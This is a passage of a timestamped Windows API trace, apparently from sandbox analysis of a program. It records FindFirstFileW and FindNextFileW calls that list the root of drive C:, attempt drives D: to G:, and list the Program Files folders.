cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x78d17e5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78d17e5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78d17e5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x551dbbfd, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x551dbbfd, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0xb2ef291, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x85890a37, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x85890a37, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbf90d48, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x48000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3b17144e, ftLastAccessTime.dwHighDateTime=0x1d70e8a, ftLastWriteTime.dwLowDateTime=0x3b17144e, ftLastWriteTime.dwHighDateTime=0x1d70e8a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fadb87, ftLastAccessTime.dwHighDateTime=0x1d709ed, ftLastWriteTime.dwLowDateTime=0x31fadb87, ftLastWriteTime.dwHighDateTime=0x1d709ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x858b6c65, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x858b6c65, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbfb6fb2, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x85289733, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x2dbfc137, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x2dbfc137, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0302.117] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb240a0a0, ftLastAccessTime.dwHighDateTime=0x1d70aa1, ftLastWriteTime.dwLowDateTime=0xb240a0a0, ftLastWriteTime.dwHighDateTime=0x1d70aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0302.118] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8a4 | out: lpFindFileData=0xdd8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb240a0a0, ftLastAccessTime.dwHighDateTime=0x1d70aa1, ftLastWriteTime.dwLowDateTime=0xb240a0a0, ftLastWriteTime.dwHighDateTime=0x1d70aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0302.118] FindClose (in: hFindFile=0x526d60 | out: hFindFile=0x526d60) returned 1 [0302.241] FindFirstFileW (in: lpFileName="D:\\*", lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.255] FindFirstFileW (in: lpFileName="E:\\*", lpFindFileData=0xdd8c0 | out: lpFindFileData=0xdd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.271] FindFirstFileW (in: lpFileName="F:\\*", lpFindFileData=0xdd8ac | out: lpFindFileData=0xdd8ac*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.286] FindFirstFileW (in: lpFileName="G:\\*", lpFindFileData=0xdd898 | out: lpFindFileData=0xdd898*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0302.301] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\*", lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3b17144e, ftLastAccessTime.dwHighDateTime=0x1d70e8a, ftLastWriteTime.dwLowDateTime=0x3b17144e, ftLastWriteTime.dwHighDateTime=0x1d70e8a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x526f20 [0302.301] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3b17144e, ftLastAccessTime.dwHighDateTime=0x1d70e8a, ftLastWriteTime.dwLowDateTime=0x3b17144e, ftLastWriteTime.dwHighDateTime=0x1d70e8a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.301] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x8feaf6a2, ftCreationTime.dwHighDateTime=0x1d70a94, ftLastAccessTime.dwLowDateTime=0x5848502d, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848502d, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0302.301] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x57cc05fe, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57cc05fe, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0302.301] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.301] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x52c99304, ftCreationTime.dwHighDateTime=0x1d70aa1, ftLastAccessTime.dwLowDateTime=0x58543613, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x58543613, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57ad0728, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57ad0728, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x1b83b055, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x57af69f3, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57af69f3, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x54df1e60, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x54df1e60, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.NET", cAlternateFileName="MICROS~1.NET")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x303e5d3c, ftCreationTime.dwHighDateTime=0x1d709ed, ftLastAccessTime.dwLowDateTime=0x57cc05fe, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57cc05fe, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Firefox", cAlternateFileName="MOZILL~1")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31d695ab, ftCreationTime.dwHighDateTime=0x1d709ed, ftLastAccessTime.dwLowDateTime=0x33713a47, ftLastAccessTime.dwHighDateTime=0x1d709ed, ftLastWriteTime.dwLowDateTime=0x33713a47, ftLastWriteTime.dwHighDateTime=0x1d709ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla Maintenance Service", cAlternateFileName="MOZILL~2")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde6b7421, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xde6b7421, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xde6b7421, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xde6dd69d, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0xde6dd69d, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0xde6dd69d, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57ceb8a2, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57ceb8a2, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57c9a490, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57c9a490, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~2")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57763485, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57763485, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WINDOW~3")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57aaa76b, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57aaa76b, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Multimedia Platform", cAlternateFileName="WINDOW~4")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57cc05fe, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57cc05fe, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WI67CB~1")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57c9a490, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57c9a490, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WI8A19~1")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57cc05fe, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57cc05fe, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57cc05fe, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57cc05fe, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57af69f3, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57af69f3, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 1 [0302.302] FindNextFileW (in: hFindFile=0x526f20, lpFindFileData=0xdd8d4 | out: lpFindFileData=0xdd8d4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57af69f3, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57af69f3, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsPowerShell", cAlternateFileName="WID5B1~1")) returned 0 [0302.302] FindClose (in: hFindFile=0x526f20 | out: hFindFile=0x526f20) returned 1 [0302.318] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x526d60 [0302.318] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x61f7ccc8, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x61f7ccc8, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0302.318] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x57336f0e, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57336f0e, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0302.318] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2f72013, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9701bb02, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9701bb02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0302.318] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x57af69f3, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x57af69f3, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0302.318] FindNextFileW (in: hFindFile=0x526d60, lpFindFileData=0xdd8d0 | out: lpFindFileData=0xdd8d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1d180aa, ftCreationTime.dwHighDateTime=0x1d709ec, ftLastAccessTime.dwLowDateTime=0x5848ff34, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x5848ff34, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 